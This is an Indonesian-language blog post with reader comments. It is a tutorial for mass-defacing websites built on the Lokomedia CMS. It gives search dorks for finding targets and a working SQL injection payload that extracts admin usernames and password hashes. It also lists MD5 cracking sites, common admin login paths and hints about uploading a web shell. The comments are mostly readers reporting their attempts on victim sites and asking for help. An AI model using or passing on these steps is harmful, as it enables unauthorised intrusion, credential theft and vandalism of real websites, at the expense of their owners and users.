Deface SQL Lokomedia




Malem fanss :* Malem juga haters :p. Berandal update lagi nih :* Kali ini gw mau share Tutorial Cara Deface CMS Lokomedia. Gw bikin tutorial ini gara2 gw liat salah satu kiriman Master Web Lokomedia di grup FB Indonesia Defacer Tersakiti. Gw bingung gimana sih kok bisa dapet segitu banyak.

Oke, simak langsung aja ya tutorial deface web cms lokomedia :) .

Bahan : 

1. Dork :
inurl:/statis-1-profil.html
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html
   Kembangin lagi biar dapet yg VULN + Perawan :p
   Dork lengkap tunggu post selanjutnya :*

2. Exploit
    'union+select+make_set(6,@:=0x0a,(select(1)from(users)[email protected]:=make_set(511,@,0x3C6C693E,username,password)),@)--+

3. MD5 Decrypter
      KHUSUS MD5 DECRYPTER, LU DECRYPT PAKE OTAK LU NDIRI! 
      Bercanda :v Ada tools online nya kok :p
https://hashkiller.co.uk/md5-decrypter.aspx
http://md5online.org/

Tutorial:
1. Dorking pake dork di atas.

2. Pilih salah satu target. Salah dua juga gapapa :v

3. Masukan injeksi nya.
'union+select+make_set(6,@:=0x0a,(select(1)from(users)[email protected]:=make_set(511,@,0x3C6C693E,username,password)),@)--+ 
   Gatau caranya? :v Sini gw ajarin :p
   http://site.co.li/statis-1-profil.html lu tambahin exploit nya sesudah angka. Jadinya gini:
   http://site.co.li/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)[email protected]:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html

Baca juga: Install Websploit Termux

4. Kalo vuln jadinya bakal kek gini.



5. Tekan Ctrl+U trus copy MD5 nya ke MD5 Decrypter.

6. Tinggal cari admin page nya. Biasanya sih di:
http://target.co.li/admin
http://target.co.li/adminweb
http://target.co.li/administrator
http://target.co.li/redaktur

7. Tanem shell? Use ur brain :) Jangan maunya disuapin mulu!

Baca jugaTutorial Deface WP Themes Qualifire.

8. Akses shell? Klik kanan gambar yg ancur. trus 'Copy Image Location'.

9. Jan lupa pasang nick gw di Script lu :v Berandal & OWL SQUAD :)

Saran gw sih, jangan langsung injek web nya. Cari dulu admin login nya :) Biar gak sakit hati :P
Simak video gw dibawah :D (terdelete)


Okee, cukup ya tutor kali ini :D Kalo ada salah2 kata mohon maap :)

Sumber: Garuda Security Hacker dan TKJ Cyber Art

Regards,
Berandal. [OWL SQUAD]

24 comments

  1. kok agan gampang bener ya :v, ane gagal mulu pas bagian hash md5, selalu not found pas mau di decrypt di hashkiller / md5decrypt. solusi dong gan

    1. Faktor face :v, mungkin belum beruntung, atau kalo mau yha decrypt manual sendiri :D, atau gk yha asal nebak aj

  2. coba cek http://idamnuriqbal.id apa ada kelemahannya gan masta, klu ada mohon info dmana letak kelemahannya. agar dapat saya perbaiki
    terima kasih.

    1. ente pake CMS apa gan ?

    2. sorry min w numpang lewat doang :V

      edeh bocah 1 ni :'v cms gk ada web make blogger :'v pea

    3. This comment has been removed by the author.

  3. kalau login di cpanel suka salah nih

    1. password yg didapat dengan teknik sql lokomedia beda sama password cpanel gan :)

  4. judul lagu videonya apa gan?

    1. bukannya diliatin pas aal video gan :D

  5. udh nemu vuln + id pw admin login udh ketemu ehh pas mau isi id pw admin malah gk ada :3

  6. ID+Pass udah dapet, eh adminnya loginnya yg ribet dicari XD

    1. itu masalah utama sql lokmed ini hwhwh

    2. Ane udah ke cpanel tpi waktu koneksi berahir mulu gan

  7. Kok blank ya mas ? Udah berhasil semua , waktu masuk ke log-in admin udah dimasukin datanya kok blank ?

  8. Njemg Not Found semua :3

  9. Cari admin loginnya very hard..

  10. ada yg tau ini tipe hash apa?? c1717b01367691479191356d2ee376d7

  11. admin login nya gimana nih :V pada ngilang gua liat di site site korban :V

  12. di umpetin kali ya :V

  13. kampret

  14. LINK HALAMAN ADMIN LOGIN DIMANA? UDH KELILING GAK ADA TOMBOL LOGIN AKMJ

  15. unch unch :*
    berandal... aku ngefans sama berandal :*

  16. Web Vulnnya berbentuk apa gan? Gw daritadi nyari pas masukin exploit 404 NOT FOUND
    Mohon dijawab:)
    Salken dari JAKARTA CYBER ARMY